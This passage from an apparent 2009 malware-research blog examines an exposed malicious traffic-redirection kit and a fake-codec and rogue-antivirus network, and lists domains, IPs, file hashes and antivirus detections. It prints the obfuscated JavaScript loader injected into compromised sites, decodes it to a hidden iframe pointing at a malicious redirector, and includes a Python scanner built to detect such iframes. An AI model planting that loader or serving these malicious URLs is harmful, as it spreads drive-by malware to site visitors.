style="padding-left:10px; color: #333; font-size:12px;">uptime_main.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">users.html</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">files:</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">cgi.pm</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">counter.gif</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">curl</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">default.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">gotourl.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">html:</td> <td valign="top" style="padding-left:10px; color: #333; 
font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">image files and javascript (gif, js)</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">install:</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">freebsd4 // in.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">freebsd5 // in.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">freebsd6 // in.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">linux // in.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">stats:</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: 
#333; font-size:12px;">index.html</td></tr></table><p>The admin page on this server has no password, so you can simply open it and see stats like these:<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjArn76fu0bLrC93b_3cyLN98bfmS3RfRw4KrialeavhbLDdF_iNm-zkGCEPi02USUDFtblK7w0UBPwo-oYiw_d0O2_D4YMEuY4p7xQXa6UPiXNmBjMZJ9aQVcxeK6ZbpqyTyBmBx0XfgoK/s1600-h/inside-the-malicious-traffic1.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 252px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjArn76fu0bLrC93b_3cyLN98bfmS3RfRw4KrialeavhbLDdF_iNm-zkGCEPi02USUDFtblK7w0UBPwo-oYiw_d0O2_D4YMEuY4p7xQXa6UPiXNmBjMZJ9aQVcxeK6ZbpqyTyBmBx0XfgoK/s320/inside-the-malicious-traffic1.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5318210743794634130" /></a><br /> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiljYoeRy5rip46Z_aD8ARJtRpEd50UQvZJecM_IOsSehgqX0tcTlsNhRSen6UdxLx7J4DipHXY_gWD8lvigYmAfL24qyBvBaekNlg0eUbjj0XmAsSeloXNgOO9mXLJzqkK3vmR3cZSvddc/s1600-h/inside-the-malicious-traffic.jpg"><img style="cursor:pointer; cursor:hand;width: 198px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiljYoeRy5rip46Z_aD8ARJtRpEd50UQvZJecM_IOsSehgqX0tcTlsNhRSen6UdxLx7J4DipHXY_gWD8lvigYmAfL24qyBvBaekNlg0eUbjj0XmAsSeloXNgOO9mXLJzqkK3vmR3cZSvddc/s320/inside-the-malicious-traffic.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5318210725183346962" /></a><br /><br />So now we know the IP, the domain name and the URLs used after redirection, <br />but where is the traffic coming from? <br /><br />Let's take a look at another folder, "/memory/".<br /><br />This folder holds files like 1.access.log, 2.access.log, 5.access.log, <br />25.access.log, 70.access.log etc. <br /><br />Some related topics on this blog refer to onlinedetect.com and 0day33hours.com for another malware campaign. Similar files can be found using Google 
<a href="http://www.google.com/search?q=site:onlinedetect.com&hl=en&lr=&as_qdr=all&num=100&filter=0" target="_blank">here</a> and <a href="http://www.google.com/search?q=site:0day33hours.com&hl=en&lr=&as_qdr=all&num=100&filter=0" target="_blank">here</a>.<br /><br />2.access.log - This file contains the IPs of visitors reaching infected <br />websites; some are in the Czech Republic, Israel, Russia, Turkey etc. <br />The file also reveals the URLs of some compromised websites <br />where the malicious obfuscated JavaScript code has been inserted. <br /></p><table width="324" height="149" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="320"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi425lxhpwZDcUcu4Emk0oCaireGpIJtlE_SL3CpgMEevxTCF_mGzbavUkhebBM3aQs3nJil93XArnBZPdj6-x-0gGR9iwPjBe_01oHEcv0IXI6rjT-NMSZolkUrOgArJGZcdD_oOXJIgST/s1600-h/inside-the-malicious-traffic2.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 237px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi425lxhpwZDcUcu4Emk0oCaireGpIJtlE_SL3CpgMEevxTCF_mGzbavUkhebBM3aQs3nJil93XArnBZPdj6-x-0gGR9iwPjBe_01oHEcv0IXI6rjT-NMSZolkUrOgArJGZcdD_oOXJIgST/s320/inside-the-malicious-traffic2.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5318220101658169378" /><br />
</a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi55NDyurrCtJf2ARKplEeq_KAPc-0s-CMo4wJcWjOTW4lCCLBVvC7ToeTQjcQBvtf6__JOrhu1cRiE5xM-JesxO1AYmPhw1QiS4w1ZuiESRZZPZZewYD1ASh2DgvRx8-5yUCX5MQ2QMrrU/s1600-h/inside-the-malicious-traffic3.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 226px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi55NDyurrCtJf2ARKplEeq_KAPc-0s-CMo4wJcWjOTW4lCCLBVvC7ToeTQjcQBvtf6__JOrhu1cRiE5xM-JesxO1AYmPhw1QiS4w1ZuiESRZZPZZewYD1ASh2DgvRx8-5yUCX5MQ2QMrrU/s320/inside-the-malicious-traffic3.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5318220112647190210" /></a></td></tr></table><br />Line 1: <br /><br />hxxp://www.met[BLOCKED]p.com.pl/meta...........<br /><a href="http://wepawet.iseclab.org/view.php?hash=3e9535674077816c195b2f5c4af62a35&t=1238245549&type=js" target="_blank">Javascript Analysis</a><br /><br />Line 23: 77.250.xx.xx<br /><br />http%3A%2F%2Fwww%2Este[BLOCKED]tos%2Enl%2Find.....<br /><a href="http://wepawet.iseclab.org/view.php?hash=3d3e5c04a9caad44c4fd3962a140b796&t=1238243179&type=js" target="_blank">Javascript Analysis</a><br /><br />hxxp://www.gif[BLOCKED]za.pl/gify/baj...<br /><a href="http://wepawet.iseclab.org/view.php?hash=7e4046d551c230b04c501dc9aa443c5e&t=1238238377&type=js" target="_blank">Javascript Analysis</a><br /><br />The analysis confirms that all these sites have the same code added (shown here as text so that the browser does not execute it):<br /><br /><table width="231" height="149" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="827"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi55NDyurrCtJf2ARKplEeq_KAPc-0s-CMo4wJcWjOTW4lCCLBVvC7ToeTQjcQBvtf6__JOrhu1cRiE5xM-JesxO1AYmPhw1QiS4w1ZuiESRZZPZZewYD1ASh2DgvRx8-5yUCX5MQ2QMrrU/s1600-h/inside-the-malicious-traffic3.jpg"></a> &lt;script&gt;<br /> if (!myia){ document.write(unescape(' <br /> %3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63<br /> %31%35%20%73%72%63%3d%27%68%74%74%70%3a%2f<br /> %2f%73%61%6c%65%76%69%73%69%74%6f%72%2e%6e<br /> %65%74%2f%69%6e%2e%63%67%69%3f%32&%27%2b%<br /> 4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%<br /> 68%2e%72%61%6e%64%6f%6d%28%29%2a%32%31%35%<br /> 32%38%29%2b%27%37%30%65%33%66%35%31%63%35%<br /> 27%20%77%69%64%74%68%3d%35%32%20%68%65%69%<br /> 67%68%74%3d%34%31%34%20%73%74%79%6c%65%3d%<br /> 27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%<br /> 27%3e%3c%2f%69%66%72%61%6d%65%3e'));<br />}<br />var myia = true; &lt;/script&gt; <br /></td></tr><tr><td>The unescape() payload decodes to this hidden iframe:</td></tr><tr><td>&lt;iframe name=c15 src='http://salevisitor.net/in.cgi?2&'+<br /> Math.round(Math.random()*21528)+'70e3f51c5' <br /> width=52 height=414 style='display: none'&gt;&lt;/iframe&gt;</td></tr></table><br /><a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=ce800e9f77d5e2d6e1446872badc869e&t=1235442045" target="_blank">Analysis report for hxxp://salevisitor.net/in.cgi?2</a><br /><br />The script loads a PDF located at quara-best.com/[BLOCKED]e30/pdf.php?id=5352,<br />which in turn loads this executable --> <a href="http://www.virustotal.com/analisis/719a9978d900f67637d8fb2ef26e3291" target="_blank">VirusTotal Report</a><br /><br />******************
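The injected snippet above can be spotted automatically; the following Python scanner is an added example, not code from the original post or from the kit, and its sample page is constructed here from that snippet. It decodes document.write(unescape(...)) payloads the way JavaScript's legacy unescape() does and reports any hidden iframe with its host and path (the in.cgi redirector seen in the kit's file listing); all function names are my own.

```python
import re
from urllib.parse import urlsplit

# Constructed sample input (hypothetical page): the percent-encoded iframe is the
# one shown in the post above, re-joined after removing the blog's <br /> breaks.
ENCODED_IFRAME = (
    "%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63"
    "%31%35%20%73%72%63%3d%27%68%74%74%70%3a%2f"
    "%2f%73%61%6c%65%76%69%73%69%74%6f%72%2e%6e"
    "%65%74%2f%69%6e%2e%63%67%69%3f%32&%27%2b%"
    "4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%"
    "68%2e%72%61%6e%64%6f%6d%28%29%2a%32%31%35%"
    "32%38%29%2b%27%37%30%65%33%66%35%31%63%35%"
    "27%20%77%69%64%74%68%3d%35%32%20%68%65%69%"
    "67%68%74%3d%34%31%34%20%73%74%79%6c%65%3d%"
    "27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%"
    "27%3e%3c%2f%69%66%72%61%6d%65%3e"
)
SAMPLE_HTML = (
    "<html><body><p>Legitimate page content</p>\n"
    # A visible embed that must not be flagged.
    '<iframe src="https://example.com/embed" width="400" height="300"></iframe>\n'
    "<script>\n"
    "if (!myia){ document.write(unescape('" + ENCODED_IFRAME + "'));\n"
    "}\n"
    "var myia = true; </script>\n"
    "</body></html>\n"
)

UNESCAPE_CALL = re.compile(
    r"""document\.write\s*\(\s*unescape\s*\(\s*(['"])(.*?)\1\s*\)\s*\)""", re.S)
IFRAME_TAG = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR = re.compile(r"""([A-Za-z_:-]+)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s>'"]+))""")
PCT = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape(s):
    """Decode like JavaScript's legacy unescape(): %XX is a Latin-1 byte and
    %uXXXX a UTF-16 code unit; anything else (e.g. a bare '&') is left alone."""
    return PCT.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def parse_attrs(raw):
    """Attribute string of one tag -> dict; quoted or unquoted values."""
    return {k.lower(): (a or b or c) for k, a, b, c in ATTR.findall(raw)}


def is_hidden(attrs):
    """display:none / visibility:hidden, or a frame too small to be seen."""
    style = re.sub(r"\s+", "", attrs.get("style", "")).lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    try:
        w, h = int(attrs.get("width", "100")), int(attrs.get("height", "100"))
    except ValueError:
        return False
    return w <= 2 or h <= 2   # 0x0 or 1x1 frames are the other common trick


def find_hidden_iframes(html):
    """Return one dict per hidden iframe found either directly in the markup
    ("inline") or inside a document.write(unescape('...')) payload, which is
    decoded first ("unescape")."""
    sources = [("inline", html)]
    sources += [("unescape", js_unescape(m.group(2)))
                for m in UNESCAPE_CALL.finditer(html)]
    hits = []
    for origin, text in sources:
        for m in IFRAME_TAG.finditer(text):
            attrs = parse_attrs(m.group(1))
            if not is_hidden(attrs):
                continue
            # Like a browser, the src value ends at the closing quote, so the
            # Math.random() suffix the kit appends is not part of the URL.
            url = urlsplit(attrs.get("src", ""))
            hits.append({"origin": origin, "host": url.hostname or "",
                         "path": url.path, "width": attrs.get("width"),
                         "height": attrs.get("height")})
    return hits


if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE_HTML):
        print(hit)   # salevisitor.net /in.cgi, origin "unescape"
```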
<br /><br /><p> Some other related links:<br /><br /><a href="http://www.honeynet.cz/wm/wm?id=0d7bb5dbba468351f3f31f08e2" target="_blank">Honeynet Malware Detail</a><br />Analysis of hxxp://eternal.alfamoon.com <a href="http://wepawet.iseclab.org/view.php?hash=7b4db35d032c390ff182be81d0d10e4c&t=1238244179&type=js" target="_blank">here</a><br /> <br /> <a href="http://www.myspace.com/154634620" target="_blank">MySpace Profile Attacked</a> (screenshot below)<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4VUsnpf24ydZymr8RGEZ7wijU9-KkRwE-9Q6w4Xhm-BnhGXkq8s4MpjSIki5YxmMuIYOxDDcYRT-fha5Ut-PBx6j3pA0B1fHZ0dqO5gJWYIojgljQt5c6Cj8HBY4JbOzj3ORMGamhqQVR/s1600-h/MySpaceAttack-inside-the-malicious-traffic.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 262px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4VUsnpf24ydZymr8RGEZ7wijU9-KkRwE-9Q6w4Xhm-BnhGXkq8s4MpjSIki5YxmMuIYOxDDcYRT-fha5Ut-PBx6j3pA0B1fHZ0dqO5gJWYIojgljQt5c6Cj8HBY4JbOzj3ORMGamhqQVR/s320/MySpaceAttack-inside-the-malicious-traffic.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5318218293911603474" /></a><br /><br /></p></td></tr></table></td></tr></table></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-35710265135805514202009-03-28T17:20:00.000-07:002009-03-28T19:16:14.834-07:00loyaldown-loyaltube Fake Codec and RogueAV<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="1802" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td colspan="2" valign="top" height="758"><p><span style="font-size:14px; font-weight:bold">loyaldown09.com, loyaltube10.com Fake Codec and Rogue Antivirus</span><br /><br />loyaldown09.com and loyaltube10.com are sites that distribute a <b>fake codec</b>. <br />The same network also hosts sites which push rogue applications like<br />XP-Police-Antivirus and Win-PC-Defender.<br /><br />Fake codec and fake scanner page screenshots:<br /><br />loyaltube10.com [213.163.65.10]<br /> loyaldown09.com [213.163.65.9] <br /><br />hxxp://loyaltube10.com/scan/?id=..<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDhFWLv4-bJ9-bbXayuhtOt33oLFbJWxHJIfNYwlcAT5wUFamZb2D81famcIbF93RMuMt_PIjCfYeQcFDnrKLFCMEAHRHQAqRg4Lc6XSbdgs7tIcmFkdDwGdkxq3dh0BmQDzw2ojvfCjD3/s1600-h/loyaltube09.com-FakeScanner.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 271px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDhFWLv4-bJ9-bbXayuhtOt33oLFbJWxHJIfNYwlcAT5wUFamZb2D81famcIbF93RMuMt_PIjCfYeQcFDnrKLFCMEAHRHQAqRg4Lc6XSbdgs7tIcmFkdDwGdkxq3dh0BmQDzw2ojvfCjD3/s320/loyaltube09.com-FakeScanner.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5318398138422907154" /></a> <br /> <br />hxxp://loyaltube10.com/tube/?id=...&title=adult+movie<br /><br /><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWi4XaxkVv0D0j2OU_jJQA5gn3fS0GOumx1Uez98HHPgTOVw3oQfuDjytj3nPKOo_oTTCiiAv96BLYZlkE1uZh5RdOEIAmumDI2EQ4V3P33DTQGX1XDaks__c9OuGBHAfF2yDirTl1rCo8/s1600-h/loyaltube10.com-FakeCodec.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 284px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWi4XaxkVv0D0j2OU_jJQA5gn3fS0GOumx1Uez98HHPgTOVw3oQfuDjytj3nPKOo_oTTCiiAv96BLYZlkE1uZh5RdOEIAmumDI2EQ4V3P33DTQGX1XDaks__c9OuGBHAfF2yDirTl1rCo8/s320/loyaltube10.com-FakeCodec.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5318406966080548530" /></a><br /> <br /><br /></p></td></tr><tr><td height="25" colspan="2" valign="top" style="background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Mys96Pf0dtW1L7tKUiFWVVVD1ZmHLx3eZ8LXnpIEUioqMsXimIo-2wzIHbVQoKA5oDFpi1Ho5X-yiMzg8ESOj6iSKcCIdGbzEFyXa2U2q2aPFfq25hseA5fHGQH7RleVNGiNAtOWDFkt/s320/table_bg.gif) repeat-x;height:19px;padding:7px;"><b>Analysis:</b></td></tr><tr><td width="25" height="208" valign="top"><br /></td><td width="547"><br /><b>Redirector used</b>: hxxp://us-euro.biz/in.cgi?4&parameter=wifi<br />[195.190.13.234]<br /><a href="http://wepawet.iseclab.org/view.php?hash=ff1eeb8db71dfbfc2ae2710aada59ad1&t=1238292178&type=js">Analysis here</a><br />
<br /><table width="524" border="0" cellspacing="0" cellpadding="0"><tr><td> </td><td><b>Site URLs</b>:</td><td colspan="2">hxxp://loyaltube10.com/scan/?id=..</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://loyaltube10.com/tube/?id=197&title=adult+movie</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://loyaldown11.com/codec/.exe</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td> </td> <td colspan="2">hxxp://loyaldown11.com/codec/189.exe</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://loyaldown11.com/codec/197.exe</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td width="20"> </td><td width="144"><b>File info</b>:</td><td colspan="2">codec.exe</td><td width="18"> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>File size</td><td colspan="2">107011 bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td colspan="2">704298be5c6bf8671517c79b827c9206</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>ThreatExpert:</b></td><td colspan="2"><a href="http://www.threatexpert.com/report.aspx?md5=704298be5c6bf8671517c79b827c9206" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td colspan="2"><a href="http://www.virustotal.com/analisis/ca71008c571ddad0dd20a0beae25511e" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>Anubis</b>:</td><td colspan="2"><a href="http://anubis.iseclab.org/?action=result&task_id=152859c8c639017940df5f3865ec05a6f" target="_blank">Report (related: WinPC Defender)</a></td><td> 
</td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>First received</td><td colspan="2"><span id="status_fecha">03.29.2009 01:17:30 (CET)</span><br /></td><td> </td></tr><tr><td> </td><td>Results</td><td colspan="2">6/39 (15.39%)</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td width="185"><span style="color:#FF0000">(Suspicious) - DNAScan</span></td><td width="157">CAT-QuickHeal</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Suspicious File</span></td><td> eSafe</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Downloader-BON</span></td><td>McAfee</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Downloader-BON</span></td><td>McAfee+Artemis</td><td> </td></tr><tr><td> </td><td> </td><td width="185"><span style="color:#FF0000">TrojanDropper:Win32/Insebro.A</span></td><td>Microsoft</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Malware-Cryptor.Win32.Zorq</span></td><td>VBA32</td><td> </td></tr></table><br /><br /><br /><table width="524" border="0" cellspacing="0" cellpadding="0"><tr><td> </td><td><b>Site URLs</b>:</td><td colspan="2">hxxp://tubeloyal.com/scan/?id-..</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://loyaldown11.com/codec/.exe</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td width="20"> </td><td width="144"><b>File info</b>:</td><td colspan="2">codec.exe</td><td width="18"> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>File size</td><td colspan="2">107008 bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td colspan="2">eb61517f7f0906dc0e60f0e0afd1bbf1</td><td> </td></tr><tr><td> </td><td> </td><td 
colspan="2"> </td><td> </td></tr><tr><td></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>ThreatExpert:</b></td><td colspan="2"><a href="http://www.threatexpert.com/report.aspx?md5=eb61517f7f0906dc0e60f0e0afd1bbf1" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td colspan="2"><a href="http://www.virustotal.com/analisis/cef114cf8e0664be1db2657fe7b14a54" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>Anubis</b>:</td><td colspan="2"><a href="http://anubis.iseclab.org/?action=result&task_id=15b6fc83f49230144f5bf187c8020dcda" target="_blank">Report (related: WinPC Defender)</a></td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>First received</td><td colspan="2"><span id="status_fecha2">03.29.2009 01:41:38 (CET)</span><br /></td><td> </td></tr><tr><td> </td><td>Results</td><td colspan="2">6/39 (15.39%)</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td width="185"><span style="color:#FF0000">(Suspicious) - DNAScan</span></td><td width="157">CAT-QuickHeal</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Suspicious File</span></td><td> eSafe</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Downloader-BON</span></td><td>McAfee</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Downloader-BON</span></td><td>McAfee+Artemis</td><td> </td></tr><tr><td> </td><td> </td><td width="185"><span style="color:#FF0000">TrojanDropper:Win32/Insebro.A</span></td><td>Microsoft</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Malware-Cryptor.Win32.Zorq</span></td><td>VBA32</td><td> </td></tr></table><br /></td></tr><tr><td height="25" colspan="2" valign="top" 
style="background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Mys96Pf0dtW1L7tKUiFWVVVD1ZmHLx3eZ8LXnpIEUioqMsXimIo-2wzIHbVQoKA5oDFpi1Ho5X-yiMzg8ESOj6iSKcCIdGbzEFyXa2U2q2aPFfq25hseA5fHGQH7RleVNGiNAtOWDFkt/s320/table_bg.gif) repeat-x;height:19px;padding:7px;"><b>Associated websites:</b></td></tr><tr><td height="200"> </td><td><br />[213.163.65.10]<br />loyaltube.com<br />loyaltube09.com<br />loyaltube10.com <br />rakompoporyadkunazaryadku.com <br />setupdatdownload.com <br />tubeloyal.com <br />velzevuladmin.com <br />win-pc-defender.com<br />xp-police-09.com<br />xp-police-2009.com<br />xp-police-antivirus.com<br />xp-police-av.com<br />xp-police-engine.com<br /><br />[213.163.65.9]<br />loyaldown09.com<br />loyaldown11.com <br /><br /></td></tr></table></div>Unknownnoreply@blogger.com